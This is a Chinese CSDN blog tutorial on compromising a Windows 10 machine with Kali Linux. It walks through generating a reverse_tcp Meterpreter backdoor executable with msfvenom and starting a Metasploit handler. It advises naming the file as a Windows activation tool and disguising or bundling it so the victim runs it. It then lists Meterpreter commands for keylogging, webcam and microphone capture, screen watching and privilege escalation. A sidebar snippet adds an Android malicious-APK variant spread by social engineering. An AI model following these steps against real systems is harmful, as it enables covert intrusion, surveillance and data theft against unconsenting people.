Kali利用msf渗透Windows电脑(超详细)

最新推荐文章于 2025-03-03 17:45:02 发布
最新推荐文章于 2025-03-03 17:45:02 发布
阅读量3k 收藏 56
点赞数 29
文章标签: windows web安全 系统安全 网络安全 计算机网络 安全架构 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jennycisp/article/details/136313711
版权
本文详细介绍了如何在KaliLinux环境中使用msfvenom生成Windows可执行文件,执行渗透流程,包括进入管理员模式、生成Meterpreter后门、配置msfconsole以及在靶机上执行命令。重点展示了meterpreter在监控靶机和执行各种操作中的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Kali利用msfvenom渗透Windows电脑
  • 一、什么是msf
    • 演示环境
  • 二、渗透流程
    • 1.进入管理员模式
    • 2.生成可执行文件
    • 3.运行msfconsole命令
    • 4.配置参数
    • 5.在靶机打开可执行文件
    • 6.查看用户
  • 三、meterpreter渗透靶机的命令
    • 1.监控靶机电脑屏幕
    • 2.更多命令

一、什么是msf

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

演示环境

使用Kali 2021.3进行演示操作
目标靶机: Win10专业版
软件:msfvenommsfconsole(Kali系统内置)

二、渗透流程

1.进入管理员模式

命令: sudo su
解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令

在这里插入图片描述

提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可

2.生成可执行文件

命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=**<本地ip>** LPORT=**<本地端口号>** –f exe –o **<文件名>**.exe
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩
当然MSF也可以用来渗透手机、mac、Linux等
kali主机的IP地址

这个就是Kali主机的IP地址

接下来运行命令生成文件
在这里插入图片描述
默认生成的文件在根目录下
在这里插入图片描述
把刚才生成的文件放到目标靶机Win10系统中

3.运行msfconsole命令

命令: msfconsole

在这里插入图片描述

4.配置参数

(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)
(4)命令: set lport 1111(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)

参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击

在这里插入图片描述

5.在靶机打开可执行文件

在这里插入图片描述
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

6.查看用户

(1)命令: sessions(查看上钩的用户)
(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
上钩的机器
在这里插入图片描述

出现meterpreter你就已经成功的入侵的对方的电脑

三、meterpreter渗透靶机的命令

1.监控靶机电脑屏幕

命令: run vnc -i
在这里插入图片描述

2.更多命令

还可以查看帮助文档,命令help

cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程

meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本

把文件上传到靶机命令
请添加图片描述

把文件下载到主机命令
在这里插入图片描述

全套《黑客&网络安全入门&进阶学习资源包》,点击下方链接即可前往免费获取

【整整282G!】网络安全&黑客技术小白到大神全套资料,免费分享!

这份完整版的学习资料已经上传CSDN,也可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费

kali渗透Windows
m0_61680503的博客
04-13 636
运用kali渗透Windows系统打开摄像头和截图
超详细!!简单使用kaliMSF渗透Windows主机操作实战,真实有效
2401_83640658的博客
02-12 617
超详细!!简单使用kaliMSF渗透Windows主机操作实战,真实有效
如何使用kali来入侵(渗透)一台windows
baimao__Ch的博客
03-03 373
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学
热门推荐
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-27 1万+
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕。
kali渗透Windows
m0_51786204的博客
04-03 1413
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就行。解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址。(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个)可以写个容易让目标主机上钩的名字。
利用kaliWindows进行msf渗透(详细介绍)
2302_78587828的博客
09-17 2098
msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。msfvenom支持多种操作系统和架构,包括Windows、Linux、macOS以及各种CPU架构。它可以生成各种类型的恶意软件,如反向连接和绑定Shell、Meterpreter反弹Shell、恶意文档、木马等。
MSFWindows渗透测试
qq_67812668的博客
08-09 1176
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
MSFKali最强渗透工具之Metasploit
zou09241314的博客
10-23 1413
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
Kali msf教程
08-24
kali linux msf系列教程
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南,零基础入门到精通,收藏这一篇就够了
Javachichi的博客
09-27 1847
Metasploit Framework最初由HD Moore于2003年发布,并于2007年使用Ruby语言重写。MSF默认集成在Kali Linux中,同时也支持在非Kali环境下安装和使用。它提供了一套完整的渗透测试框架,包括漏洞利用模块(exploits)、攻击载荷(payloads)、辅助模块(auxiliary)、编码器(encoders)、空指令(nops)、后渗透模块(post)等多个组件。MSF的强大之处在于其可扩展性。
渗透攻防-深入了解Windows
该用户很懒,没有写简介。。。
07-29 2023
前言 本篇是基础教程,带大家了解Windows常用用户及用户组,本地提取用户密码,远程利用Hash登录到本地破解Hash。初步掌握Windows基础安全知识。 目录 第一节 初识Windows 第二节 Windows密码安全 第三节 利用Hash远程登录系统 正文 第一节 初识Windows 1.1、什么是Window Microsoft
网络安全Kali Linux 使用 MSF 渗透测试
cronaldo91的博客
03-05 3077
(6) 查看Kali Linux (2022.4)系统IP地址。(5)查看Kali Linux (2022.4)系统版本。(2)查看Kali Linux (2024.1)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。
复现|使用Kali生成木马,渗透Windows系统
Maricopig的博客
05-13 3163
简单复现了使用kali中的msfvenom工具生成木马文件,并在靶机中执行后,展示后渗透阶段可操作内容。
Kali利用MSF渗透安卓手机
最新发布
03-13
### 使用 Kali Linux 和 Metasploit Framework 对 Android 设备进行渗透测试 #### 准备工作 为了确保环境配置正确,在开始之前需更新和升级 Kali Linux 的包管理器以及安装最新版本的 Metasploit Framework[^1]。 ```bash apt update && apt upgrade -y apt install metasploit-framework -y ``` #### 启动 Metasploit Framework 通过 `msfconsole` 命令可以启动 Metasploit Framework 并进入其交互式命令行界面。这一步骤对于后续操作至关重要,因为所有的渗透测试活动都将在此环境中执行[^2]。 ```bash msfconsole ``` #### 配置监听模块 针对 Android 设备的渗透测试通常涉及使用特定的有效载荷(payload)。下面是一个常见的有效载荷设置过程: - **选择多平台反向 TCP Shell** ```ruby use exploit/multi/handler set payload android/meterpreter/reverse_tcp ``` - **设定 LHOST 参数** 这里需要指定本地 IP 地址作为回调地址,即攻击者机器上的 IP 地址。 ```ruby set LHOST <Your_Kali_IP_Address> ``` - **设定 LPORT 参数** 设置用于接收连接请求的端口号,默认情况下可以选择 4444 或其他未被占用的端口。 ```ruby set LPORT 4444 ``` - **开启监听** 执行此指令后,Metasploit 将等待来自目标设备的连接尝试。 ```ruby exploit -j -z ``` #### 创建恶意 APK 文件 为了让 Android 用户下载并运行含有恶意代码的应用程序,可利用 msfvenom 工具生成带有自定义图标和名称的 APK 文件。 ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your_Kali_IP_Address> LPORT=4444 R > malicious.apk ``` #### 社会工程学手段传播恶意应用 将生成好的 APK 发送给潜在受害者或者上传到不受信任的应用商店让对方自行下载安装。请注意这种行为仅限于合法授权范围内的安全评估活动中。 #### 获取 Meterpreter Session 一旦受害者的手机成功安装并打开了该应用程序,则会在 Metasploit 控制台中看到一个新的 session 被创建出来。此时便可以获得对受感染系统的完全控制权限。 ```ruby sessions -i <Session_ID> ``` #### 实施进一步行动 有了 meterpreter shell 访问权之后就可以开展更多深入调查动作比如提取敏感数据、提权等高级技巧。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

程序员一粟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值